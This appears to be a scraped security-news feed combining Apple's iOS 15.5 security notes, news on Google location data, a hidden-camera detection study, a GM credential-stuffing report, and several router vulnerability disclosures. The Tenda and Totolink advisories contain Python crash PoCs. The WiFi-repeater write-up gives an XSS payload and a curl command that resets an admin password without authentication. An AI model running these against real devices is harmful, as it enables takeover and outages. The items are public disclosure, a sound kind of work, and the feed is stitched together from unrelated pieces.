This issue was addressed with improved checks. This issue is fixed in iOS 15.5 and iPadOS 15.5. Processing a large input may lead to a denial of service.

Released May 16, 2022

**AppleAVD**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-26702: an anonymous researcher

**AppleGraphicsControl**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-26751: Michael DePlante (@izobashi) of Trend Micro Zero Day Initiative

**AVEVideoEncoder**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-26736: an anonymous researcher

CVE-2022-26737: an anonymous researcher

CVE-2022-26738: an anonymous researcher

CVE-2022-26739: an anonymous researcher

CVE-2022-26740: an anonymous researcher

**DriverKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: An out-of-bounds access issue was addressed with improved bounds checking.

CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)

**GPU Drivers**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-26744: an anonymous researcher

**ImageIO**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: An integer overflow issue was addressed with improved input validation.

CVE-2022-26711: actae0n of Blacksun Hackers Club working with Trend Micro Zero Day Initiative

**IOKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved locking.

CVE-2022-26701: chenyuwang (@mzzzz\_\_) of Tencent Security Xuanwu Lab

**IOSurfaceAccelerator**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-26771: an anonymous researcher

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs (@starlabs\_sg)

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-26757: Ned Williamson of Google Project Zero

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26764: Linus Henze of Pinauten GmbH (pinauten.de)

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication

Description: A race condition was addressed with improved state handling.

CVE-2022-26765: Linus Henze of Pinauten GmbH (pinauten.de)

**LaunchServices**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: An access issue was addressed with additional sandbox restrictions on third-party applications.

CVE-2022-26706: Arsenii Kostromin (0x3c3e)

**libxml2**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2022-23308

**Notes**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing a large input may lead to a denial of service

Description: This issue was addressed with improved checks.

CVE-2022-22673: Abhay Kailasia (@abhay\_kailasia) of Lakshmi Narain College Of Technology Bhopal

**Safari Private Browsing**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious website may be able to track users in Safari private browsing mode

Description: A logic issue was addressed with improved state management.

CVE-2022-26731: an anonymous researcher

**Security**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious app may be able to bypass signature validation

Description: A certificate parsing issue was addressed with improved checks.

CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)

**Shortcuts**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A person with physical access to an iOS device may be able to access photos from the lock screen

Description: An authorization issue was addressed with improved state management.

CVE-2022-26703: Salman Syed (@slmnsd551)

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 238178  
CVE-2022-26700: ryuzaki

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 236950  
CVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua wingtecher lab

WebKit Bugzilla: 237475  
CVE-2022-26710: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua wingtecher lab

WebKit Bugzilla: 238171  
CVE-2022-26717: Jeonghoon Shin of Theori

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 238183  
CVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun Lab

WebKit Bugzilla: 238699  
CVE-2022-26719: Dongzhuo Zhao working with ADLab of Venustech

**WebRTC**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Video self-preview in a webRTC call may be interrupted if the user answers a phone call

Description: A logic issue in the handling of concurrent media was addressed with improved state handling.

WebKit Bugzilla: 237524  
CVE-2022-22677: an anonymous researcher

**Wi-Fi**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may disclose restricted memory

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26745: an anonymous researcher

**Wi-Fi**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to elevate privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-26760: 08Tc3wBB of ZecOps Mobile EDR Team

**Wi-Fi**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote attacker may be able to cause a denial of service

Description: This issue was addressed with improved checks.

CVE-2015-4142: Kostya Kortchinsky of Google Security Team

**Wi-Fi**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2022-26762: Wang Yu of Cyberserval

CVE-2022-22673: About the security content of iOS 15.5 and iPadOS 15.5

Lawmakers argue Android phone data could be “weaponized against women” if the US Supreme Court officially overturns abortion protections.

More than 40 Democratic members of Congress called on Google to stop collecting and retaining customer location data that prosecutors could use to identify women who obtain abortions.

“We are concerned that, in a world in which abortion could be made illegal, Google’s current practice of collecting and retaining extensive records of cell phone location data will allow it to become a tool for far-right extremists looking to crack down on people seeking reproductive health care. That’s because Google stores historical location information about hundreds of millions of smartphone users, which it routinely shares with government agencies,” Democrats wrote May 24 in a letter led by Senator Ron Wyden (D-Ore.) and Rep. Anna Eshoo (D-Calif.). The letter was sent to Google CEO Sundar Pichai.

Specifically, Google should stop collecting “unnecessary customer location data” or “any non-aggregate location data about individual customers, whether in identifiable or anonymized form. Google cannot allow its online advertising-focused digital infrastructure to be weaponized against women,” lawmakers wrote. They also told Google that people who use iPhones “have greater privacy from government surveillance of their movements than the tens of millions of Americans using Android devices.”

The draft Supreme Court ruling overturning _Roe v. Wade_ could be followed by strict limits or bans on abortion in many states, and Democrats wrote that “Republicans in Congress are already discussing passing a law criminalizing abortion in all 50 states, putting the government in control of women’s bodies.”

Location Data From Android Phones

In their letter, Democrats told Pichai:

_While Google deserves credit for being one of the first companies in America to insist on a warrant before disclosing location data to law enforcement, that is not enough. If abortion is made illegal by the far-right Supreme Court and Republican lawmakers, it is inevitable that right-wing prosecutors will obtain legal warrants to hunt down, prosecute, and jail women for obtaining critical reproductive health care. The only way to protect your customers’ location data from such outrageous government surveillance is to not keep it in the first place._

Google obtains detailed information “from Android smartphones, which collect and transmit location information to Google, regardless of whether the phone is being used or which app a user has open,” they wrote. While Android users have to opt into this data collection, “Google has designed its Android operating system so that consumers can only enable third party apps to access location data if they also allow Google to receive their location data too. In contrast, Google is only able to collect location data from users of iPhones when they are using the Google Maps app,” the lawmakers wrote.

We contacted Google about the letter yesterday and will update this article if we get a response.

Exactly how Google’s location privacy settings work has been a matter of confusion, even for some Google employees. As we wrote in August 2020, documents from a consumer fraud suit the state of Arizona filed against Google “show that company employees knew and discussed among themselves that the company’s location privacy settings were confusing and potentially misleading.”

Democrats Say iPhone Users Have More Privacy

Because many of the cheaper smartphones use Android, the lawmakers warned of a “digital divide” affecting the privacy of people with low incomes:

_No law requires Google to collect and keep records of its customers’ every movement. Apple has shown that it is not necessary for smartphone companies to retain invasive tracking databases of their customers’ locations. Google’s intentional choice to do so is creating a new digital divide, in which privacy and security are made a luxury. Americans who can afford an iPhone have greater privacy from government surveillance of their movements than the tens of millions of Americans using Android devices._

While Google uses location data to target online ads, the company often turns over the data to law enforcement officials who obtain court orders, the Democrats wrote. “This includes dragnet ‘geofence’ orders demanding data about everyone who was near a particular location at a given time,” they wrote, adding that “Google received 11,554 geofence warrants in 2020.”

iPhones also use location services, though the lawmakers seem to be satisfied with Apple’s privacy promises. Among other things, Apple says that if location services are turned on, geo-tagged locations of nearby Wi-Fi hotspots and cell towers are sent “in an anonymous and encrypted form to Apple” to augment a “crowd-sourced database of Wi-Fi hotspot and cell tower locations.”

With the Find My feature that can locate lost devices, Apple says it “retains location information and makes it accessible to you for 24 hours, after which it is deleted” and that “device location services information is stored on each individual device and Apple cannot retrieve this information from any specific device.”

Post-_Roe_ State Abortion Laws

Assuming the Supreme Court overturns _Roe v. Wade_, there could be more state laws like the recently enacted Texas Heartbeat Act that bans abortions after it’s possible to detect a “fetal heartbeat.” The law defines that as “cardiac activity or the steady and repetitive rhythmic contraction of the fetal heart within the gestational sac.” This effectively bans abortions after six weeks, and the state law lets private citizens file lawsuits to obtain injunctions and damages of at least $10,000 per abortion.

These lawsuits could be filed against anyone who “performs or induces an abortion” that violates the Texas Heartbeat Act or anyone who “knowingly engages in conduct that aids or abets” an abortion after a fetal heartbeat is detected. Aiding or abetting includes “paying for or reimbursing the costs of an abortion through insurance or otherwise, if the abortion is performed or induced in violation of this subchapter.” Civil suits can also be filed against anyone who “intends to engage in the conduct” described in the law.

The Texas law doesn’t allow the exact scenario Democrats warned of in their letter, that prosecutors could jail women who obtain abortions. But states would have more leeway to enact stricter anti-abortion laws or bans after lifting _Roe v. Wade_.

The Guttmacher Institute, a pro-choice research group, says that “26 states are certain or likely to ban abortion without _Roe_.” Many of these states have laws that were enacted before the 1973 _Roe v. Wade_ decision and never removed, laws that were enacted after _Roe_ but currently blocked by court order, or “trigger” bans that would “take effect automatically or by quick state action if _Roe_ no longer applies.”

_This story originally appeared on_ _Ars Technica__._

Google Urged to Stop Tracking Location Data Ahead of Roe Reversal

Tenda AC Series Router AC18_V15.03.05.19(6318) was discovered to contain a stack-based buffer overflow in the httpd module when handling /goform/WifiExtraSet request.

**Tenda Router AC18 Vulnerability**

This vulnerability lies in the /goform/WifiExtraSet page which influences the lastest version of Tenda Router AC18. (The latest version is AC18\_V15.03.05.19(6318))

**Vulnerability Description**

There is a **stack-based buffer overflow** vulnerability in function fromSetWirelessRepeat.

In function fromSetWirelessRepeat it reads user provided parameter wpapsk_crypto into victim_buf, and this variable is passed into function strcpy without any length check, which may overflow the stack-based buffer vuln_buf.

So by requesting the page /goform/WifiExtraSet, the attacker can easily perform a **Deny of Service Attack**.

**PoC**

import requests

IP \= "10.10.10.1"
url \= f"http://{IP}/goform/WifiExtraSet?"
url += "wl\_mode=not\_ap&security=wpapsk&wpapsk\_key=kkkkkkkk&wpapsk\_crypto=" + "s" \* 0x600

response \= requests.get(url)

**Timeline**

*   2022-05-07: Report to CVE & CNVD;
*   2022-05-26: CVE ID assigned (CVE-2022-30475)

**Acknowledge**

Credit to @peanuts and @cylin from IIE, CAS.

CVE-2022-30475: VulnRepo/IoT/Tenda/3 at master · lcyfrank/VulnRepo

Tenda AC Series Router AC18_V15.03.05.19(6318) has a stack-based buffer overflow vulnerability in function form_fast_setting_wifi_set

**Tenda Router AC18 Vulnerability**

This vulnerability lies in the /goform/fast_setting_wifi_set page which influences the lastest version of Tenda Router AC18. (The latest version is AC18\_V15.03.05.19(6318))

**Vulnerability Description**

There is a **stack-based buffer overflow** vulnerability in function form_fast_setting_wifi_set.

In function form_fast_setting_wifi_set it reads user provided parameter ssid into src, and this variable is passed into function strcpy without any length check, which may overflow the stack-based buffer s.

So by requesting the page /goform/fast_setting_wifi_set, the attacker can easily perform a **Deny of Service Attack**.

**PoC**

import requests

IP \= "10.10.10.1"
url \= f"http://{IP}/goform/fast\_setting\_wifi\_set?"
url += "ssid=" + "s" \* 100

response \= requests.get(url)

**Timeline**

*   2022-05-06: Report to CVE & CNVD;
*   2022-05-26: CVE ID assigned (CVE-2022-30473)

**Acknowledge**

Credit to @peanuts and @cylin from IIE, CAS.

CVE-2022-30473: VulnRepo/IoT/Tenda/2 at master · lcyfrank/VulnRepo

A group of academics has devised a system that can be used on a phone or a laptop to identify and locate Wi-Fi-connected hidden IoT devices in unfamiliar physical spaces.
With hidden cameras being increasingly used to snoop on individuals in hotel rooms and Airbnbs, the goal is to be able to pinpoint such rogue devices without much of a hassle.
The system, dubbed Lumos, is designed with this

A group of academics has devised a system that can be used on a phone or a laptop to identify and locate Wi-Fi-connected hidden IoT devices in unfamiliar physical spaces.

With hidden cameras being increasingly used to snoop on individuals in hotel rooms and Airbnbs, the goal is to be able to pinpoint such rogue devices without much of a hassle.

The system, dubbed **Lumos**, is designed with this intent in mind and to "visualize their presence using an augmented reality interface," said Rahul Anand Sharma, Elahe Soltanaghaei, Anthony Rowe, and Vyas Sekar of Carnegie Mellon University in a new paper.

At its core, the platform works by snuffing and collecting encrypted wireless packets over the air to detect and identify concealed devices. Subsequently, it estimates the location of each identified device with respect to the user as they walk around the perimeter of the space.

The localization module, for its part, combines signal strength measurements that are available in 802.11 packets (aka Received Signal Strength Indicator or RSSI) with relative user position determined by visual inertial odometry (VIO) information on mobile phones.

On Apple's iOS devices, for instance, the positional tracking is achieved by means of ARKit, a developer API that makes it possible to build augmented reality experiences by taking advantage of the phone's camera, CPU, GPU, and motion sensors.

"As the user walks closer to each device, the RSSI values corresponding to those data points increase and then reduce as she walks away from the device," the researchers said. "Lumos leverages the spatial measurements of RSSI values and their variations to estimate the location of each device."

What's more, Lumos can localize IoT devices irrespective of the user's walking speed. Also incorporated is a fingerprinting module that analyzes the captured 802.11 traffic patterns using a machine learning model to identify the devices based on the MAC addresses.

The research evaluated Lumos across 44 different IoT devices spanning various types, models, and brands across six different environments, finding that it can identify hidden devices with 95% accuracy and locate them with a median error of 1.5m within 30 minutes in a two-bedroom, 1000 sq.ft. apartment.

That said, an advanced attacker can leverage techniques like MAC address randomization to evade detection and sidestep localization by arbitrarily modifying the devices' transmit power.

"Lumos can potentially generalize across different device brands and models, as long as it has seen at least one device with similar behavior in the training phase," the researchers said, pointing to how the system can even identify unprofiled devices.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Lumos System Can Find Hidden Cameras and IoT Devices in Your Airbnb or Hotel Room

US car producer General Motors says its Rewards platform was the victim of a credential stuffing attack last month.
The post General Motors suffers credential stuffing attack appeared first on Malwarebytes Labs.

American car manufacturer General Motors (GM) says it experienced a credential stuffing attack last month. During the attack customer information and reward points were stolen.

The subject of the attack was an online platform, run by GM, to help owners of Chevrolet, Buick, GMC, and Cadillac vehicles to manage their bills, services, and redeem rewards points.

**Credential stuffing**

Credential stuffing is a special type of brute force attack where the attacker uses existing username and password combinations, usually ones that were stolen in a data breach on another service.

The intention of such an attack is not to take over the website or platform, but merely to get as many valid user account credentials and use that access to commit fraud, or sell the valid credentials to other criminals.

To stop a target from just blocking their IP address, an attacker will typically use rotating proxies. A rotating proxy is a proxy server that assigns a new IP address from the proxy pool for every connection.

**The attack**

GM disclosed that it detected the malicious login activity between April 11 and April 29, 2022, and confirmed that the threat actors exchanged customer reward bonuses of some customers for gift certificates.

The My GM Rewards program allows members to earn and redeem points toward buying or leasing a new GM vehicle, as well as for parts, accessories, paid Certified Service, and select OnStar and Connected Services plans.

GM says it immediately investigated the issue and notified affected customers of the issues.

**Victims**

GM contacted victims of the breach, advising them to follow instructions to recover their GM account. GM is also forcing affected users to reset their passwords before logging in to their accounts again. In the notification for affected customers, GM said it will be restoring rewards points for all customers affected by this breach.

GM specifically pointed out that the credentials used in the attack did not come from GM itself.

> “Based on the investigation to date, there is no evidence that the log in information was obtained from GM itself. We believe that unauthorized parties gained access to customer login credentials that were previously compromised on other non-GM sites and then reused those credentials on the customer’s GM account.”

**Stolen information**

Attackers could have accessed the following Personally Identifiable Information (PII) of a compromised user:

*   First and last name
*   Email address
*   Physical address
*   Username and phone number for registered family members tied to the account
*   Last known and saved favorite location information
*   Search and destination information

Other information that was available was car mileage history, service history, emergency contacts, Wi-Fi hotspot settings (including passwords), and currently subscribed OnStar package (if applicable).

GM is offering credit monitoring for a year.

**Mitigation**

What could GM have done to prevent the attack? It doesn’t currently offer multi-factor authentication (MFA)which would have stopped the attackers from gaining access to the accounts. GM does ask customers to add a PIN for all purchases.

This incident demonstrates how dangerous it is to re-use your passwords for sites, services and platforms. Even if the account doesn’t seem that important to you, the information obtainable by accessing the account could very well be something you wish to keep private.

Always use a different password for every service you use, and consider using a password manager to store them all. You can read some more of our tips on passwords in our blog dedicated to World Password Day.

Stay safe, everyone!

General Motors suffers credential stuffing attack

Totolink A3600R V4.1.2cu.5182_B20201102 was discovered to contain a stacker overflow in the fread function at infostat.cgi. This vulnerability allows attackers to cause a Denial of Service (DoS) via the parameter CONTENT_LENGTH.

Affect device: TOTOLink WiFi Router A3600R V4.1.2cu.5182\_B20201102 (http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=63&ids=36)

Vulnerability Type: Stack overflow

Impact: Denial of Service(DoS)

**Vulnerability description**

The stack overflow vulnerability is in the in the fread function in the infostat.cgi

 We can see that stdin is obtained directly from the http request parameter .Then they will be spliced to stack by function fread without any security check,which causes stack overflow.

This vulnerability allows attackers to perform a Denial of Service(DoS) via the CONTENT_LENGTH parameter by POST the page /cgi-bin/infostat.cgi with long Code

**POC**

import requests
data \= {'a':'a'\*0x4000}
res \= requests.post("http://11.11.11.2/cgi-bin/infostat.cgi", data\=data)
print(res.content)

CVE-2022-29377: iot-cve/totolink/a3600r at master · molezsbd/iot-cve

Pix-Link MiNi Router 28K.MiniRouter.20190211 was discovered to contain a stored cross-site scripting (XSS) vulnerability due to an unsanitized Security Key parameter.

Security analysis of some low-cost WiFi Repeaters

Many of us have had to choose a WiFi repeater to extend the wireless coverage of home routers. Nowadays, such device types are spreading fast and sometimes low-cost and poorly configured ones might severely harm the security and privacy of your home network, including devices commonly attached to it.

The problem is exacerbated by the huge amount of vendors selling these devices at quite low prices, which render them the most attractive choice for majority of the people. However, what most people should be aware of is that their low-cost devices might lead to… well.. other kind of costs!  
Unfortunately, sometimes these costs may be higher than if you had chosen a different, more expensive device.

_Why_ these devices?

*   They are not _too_ expensive (about 15€).  
    Thus, they are the most attractive choice for less-aware customers.
*   They are among the very first results provided by Amazon (not just the Italian version) when you search for keywords like “WiFi Repeater/Extender”.
*   At the time of writing, the second device was considered an Amazon’s Choice (Amazon IT). Therefore, most likely, many of them have already been sold.

The following sections summarize the vulnerabilities I found as a result of my analysis. The next section will briefly discuss, for each device analyzed, the vulnerabilities with an assigned CVE ID I’ve been able to found as well as other minor security-related issues affecting the involved devices.

To fix such vulnerabilities you should update your device’s firmware to the latest available version but sometimes, with poorly configured firmwares (perhaps bugs?!), you won’t even be allowed to download software updates, leaving you with only two choices: either you stay vulnerable or you replace the device at all.

Device (**1/3**): Acexy Wireless-N WiFi Repeater REV 1.0  
Firmware: 28.08.06.1

****CVE-2021–28160 — SSID Reflected XSS****

As with every WiFi Repeater, you have to choose the wireless network which range you wish to extend, providing the password (if any) of its wireless AP.

The page shown above, “/repeater.html”, allows to select the network and displays the available wireless APs without applying any kind of sanitization on the data included into the HTML page, which is rendered by the browser.

Therefore, by modifying the SSID of a wireless network such as the following you can achieve JavaScript code executed every time a user visit the page _repeater.html_ or, more in general, when a user just click on the “Repeater Wizard” section on the homepage.

<img src=no onerror=alert(1) foo

**CVE-2021–28936— Improper Access Control on password reset requests**

An Improper Access Control (CWE-284) vulnerability allows any device to change the Web management interface password by sending just one specially crafted HTTP GET request, without requiring any previous authentication.

In order to exploit the vulnerability you need to know the current management interface account name (by default**_,_** it is **_admin_**).  
The following curl command change the management interface password to “_mystrongpass123_”, assuming the account name is _admin_ and the IP address of the device is the default one (192.168.10.1).

curl -i -s -o /dev/null -w "%{http\_code}" -k -X $'GET' \\  
    -H $'Host: 192.168.10.1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: \*/\*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' -H $'Referer: http://192.168.10.1/password.html' -H $'Content-Length: 4' \\  
    --data-binary $'\\x0d\\x0a\\x0d\\x0a' \\  
    $'**http://192.168.10.1/login.htm**?CMD=SYS&GO=login.htm&SET0=18416128=en&SET1=17498624=**admin**&SET2=16843264=**mystrongpass123**&rd=0.7548039925199851&\_=1615725324336'

Once the request is handled successfully, just try to login with the password you provided earlier.

**CVE-2021–28937— Plaintext password reflected in /password.html page**

The web management interface password is included in the /_password.html_ HTML page, which contains a form for changing the username and the password.

To exploit this vulnerability just visit the URL _http://192.168.10.1/password.html_ and inspect the returned HTML element with any browser you prefer.

This kind of password disclosure also implies the device stores the password as a plaintext, without computing any hash value.

**Others**

*   HTTPS is never used and HTTP traffic can be easily intercepted on a LAN.

Username and password are sent unencrypted during authentication and, additionally, every time you visit _/password.html_ you give to a potential attacker the chance to read your current username and password (both included in the HTML document).

*   Telnet service listening on port 23.

The default username is easy to guess (**_admin_**) but the password is not among the most trivial or common ones. I didn’t manage to guess the password though you might be luckier, or just better than me at generating password lists.

**Device** (**2/3**): SOOTEWAY Wi-Fi Range Extender V1.5  
Firmware: apparently no firmware updates  
Arch: MIPS

**CVE-2021–30028 — Weak credentials lead to remote firmware read/write/erasure**

The device shown above also has some vulnerabilities.  
In particular, a Telnet service is listening on port 23 and default credentials are among the most common ones (**admin**:**admin**). However, what is worse is that after the login succeeds, the service provides a complete set of instructions that allows a potential adversary to do literally anything with your WiFi Repeater. He might be able to modify the device configuration like changing the repeater password, modify CPU registers values and even flash/overwrite the firmware. All of these can be done remotely.

For instance, it would be possible to compromise the device forever, overwriting part of the firmware and preventing the factory reset. The following two screenshots show the things an attacker would have access to and also one way he could stop the correct functioning of the device _permanently_.

From this moment on, the WiFi Repeater becomes literally useless and must be replaced. Finally, it appears that no firmware update is foreseen, therefore you should either buy a new device or keep your vulnerable one as it was mentioned initially.

**Device** (**3/3**): Pix-Link MiNi Router  
Firmware: v28K.MiniRouter.20190211

The firmware installed on this device also does not sanitize user-supplied input. This led to the discovery of two stored XSS vulnerabilities (**CVE-2021–43728** and **CVE-2021–43729**) affecting the SSID and wireless security key values respectively.

To replicate the simple XSS _alert_ POC just intercept the request sent when you _Apply_ changes from _Advance>Wireless_ setting page through a proxy (e.g. Burp community will suffice). Note that intercept/modify is required to overcome the character limitation.

Once our crafted value is set it will be enough to visit the extender home page to trigger the JS alert as depicted by the next screenshot.

Regarding the second issue (CVE-2021–43729):  
\- Enter your XSS payload in the same Wireless setting page mentioned above  
\- Apply changes

Then just connect back to the WiFi extender providing the payload itself as password. The JS alert will spawn as soon as the home page is visited:

**Conclusion**

When a software/hardware device, or a product in general, is sold at much lower prices than others there are usually reasons. Such reasons may vary, including bad implementation choices, less development or testing effort and security vulnerabilities too. However, since even the most expensive devices might be vulnerable you should (at least) try to choose wisely when it comes to your home network security.

There are plenty more expensive WiFi extenders I might suggest, such as this one by TP-Link. However, I’d like to avoid so since even that one has an interesting client-side encryption which should be reversed to see what it’s intended to hide :)

CVE-2021-43729: Hunting for Vulnerabilities in Low-Cost WiFi Repeaters

Foxit PDF Editor v11.3.1 was discovered to contain an arbitrary file upload vulnerability.

Tag

#wifi